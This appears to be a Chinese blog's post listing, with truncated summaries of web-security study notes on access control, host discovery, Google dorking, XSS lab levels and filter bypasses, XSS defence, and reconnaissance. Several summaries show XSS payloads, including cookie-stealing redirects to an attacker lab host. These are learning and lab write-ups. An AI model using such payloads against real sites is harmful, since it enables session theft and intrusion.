摘要: 访问控制崩溃 未对通过身份验证的用户实施恰当的访问控制。攻击者可以利用这些缺陷访问未经授权的功能和数据,例如:访问其他用户的账户、查看敏感文件、修改其他用户的数据、更改访问权限等。 eg:零元购 通过修改URL、内部应用程序状态或HTML页面绕过访问控制检查,或简单地使用自定义地API攻击工具 允许 阅读全文
posted @ 2024-03-30 11:20 LaiBuNiZi 阅读(21) 评论(0) 推荐(0) 编辑
摘要: 1.二层主机发现-arping/netdiscovet命令探索 1.1 利用osi中链路层的协议进行发现,一般使用arp协议 1.2 优缺点:速度快可靠性高(优)不可路由(缺) 1.3 使用apring命令查看局域网中的主机是否存活 arping 192.168.10.12 -c 5 -c参数表示发 阅读全文
posted @ 2024-03-10 16:33 LaiBuNiZi 阅读(9) 评论(0) 推荐(0) 编辑
摘要: 1.常用的google关键字 site 指定域名 inurl URL中存在的关键字页面字 intext 网页中内容里面的关键 敏感信息 Filetype 指定文件类型 intitile 网页标题中的关键字 link 返回你所有的指定域名连接 info 查找指定站点信息 cache 搜索Google里 阅读全文
posted @ 2024-03-09 22:14 LaiBuNiZi 阅读(48) 评论(0) 推荐(0) 编辑
摘要: level1 payload:<scirpt>alert(123);</script> 从php代码可以看出level1没有对输入的数据进行防御! level2 输入level1的payload 可以看到输入到input标签中的value值中,所以用'"用来闭合value,用>来闭合input标签 阅读全文
posted @ 2024-03-09 20:00 LaiBuNiZi 阅读(46) 评论(0) 推荐(0) 编辑
摘要: 1.什么是AWVS? 一个自动化的web应用程序安全测试工具,可以扫描任何可通过web浏览器访问和遵循http/https规则的web站点和web应用程序 2.安装AWVS: docker pull secfa/docker-awvs docker run -it -d -p 13443:3443 阅读全文
posted @ 2024-03-05 23:02 LaiBuNiZi 阅读(219) 评论(0) 推荐(0) 编辑
摘要: 查看磁盘空间大小,目前/分区大小为20G,并且只有一个磁盘 在虚拟机上增加40G /dev/nvme0n1p目前为60G,接下来对磁盘进行分区,创建物理卷,将新增的物理卷加到卷组里 对磁盘分区,使用fdisk /dev/nvme0n1,输入n新建分区 n 为增加一个新的分区 p 为打印一个分区表 其 阅读全文
posted @ 2024-03-05 19:18 LaiBuNiZi 阅读(60) 评论(0) 推荐(0) 编辑
摘要: XSS防御的总体思路是: 对输入进行过滤,特殊符号必须过滤掉,单引号、双引号、尖括号之类的, 对输出进行编码过滤: 根据业务需求进行过滤, 比如输出点要求输入手机号,则只允许输入手机号格式的数字。 转义: 所有输出到前端的数据都根据输出点进行转义, 比如输出到html中进行html实体转义,输入到S 阅读全文
posted @ 2024-03-04 22:06 LaiBuNiZi 阅读(15) 评论(0) 推荐(0) 编辑
摘要: html实体编码 JS编码 1.htmlspecialchars函数 把一些预定义的字符转换为html实体 预定义的字符 &->&amp; "->&quot; '->&#039; <->&lt; >->gt; <script> --> <&ltscript&gt 默认绕过 绕过方式: payload 阅读全文
posted @ 2024-03-04 21:26 LaiBuNiZi 阅读(321) 评论(0) 推荐(0) 编辑
摘要: xss_01 正则表达式替换 绕过方式:大小写混合或纯大写绕过 paylaod:<scripT>alert(AAA);</Script>或<SCRIPT>alert(123);<SCRIPT> 字符最小化 将获取的message数据中获取的大小写字符全部转换为小写 绕过方式:通过双写绕过 Paylo 阅读全文
posted @ 2024-03-03 20:04 LaiBuNiZi 阅读(21) 评论(0) 推荐(0) 编辑
摘要: 攻击者构造的网站地址:192.168.10.12:100 受害者主机:192.168.10.134 目标服务器:192.168.10.1 步骤一: 受害者主机访问目标服务器 根据提示登录 步骤二: 输入xss Payload <script>document.location = 'http://1 阅读全文
posted @ 2024-03-01 17:45 LaiBuNiZi 阅读(112) 评论(0) 推荐(0) 编辑
摘要: 实验环境 目标网站:宿主机:192.168.10.1 访问 虚拟机win11:192.168.10.134 伪造网站:192.168.10.12:100 pikachu 步骤一: 受害者cookie: 步骤二: 输入xsspayload '"><script>document.location = 阅读全文
posted @ 2024-02-28 21:13 LaiBuNiZi 阅读(35) 评论(0) 推荐(0) 编辑
摘要: Ⅰ.XSS(跨站脚本)概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS; XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在O 阅读全文
posted @ 2024-02-28 15:58 LaiBuNiZi 阅读(21) 评论(0) 推荐(0) 编辑
摘要: 备案号和ssl证书查询子域名 备案号查询:https://beian.miit.org.cn ssl证书查询子域名 https://myssl.com 1 收集真实ip 1.1超级ping 通过超级ping来判断是否使用cdn 超级ping能进行多地ping某个地址,可以理解为多个地域对同一域名进行 阅读全文
posted @ 2024-02-23 17:46 LaiBuNiZi 阅读(75) 评论(0) 推荐(0) 编辑
点击右上角即可分享
微信分享提示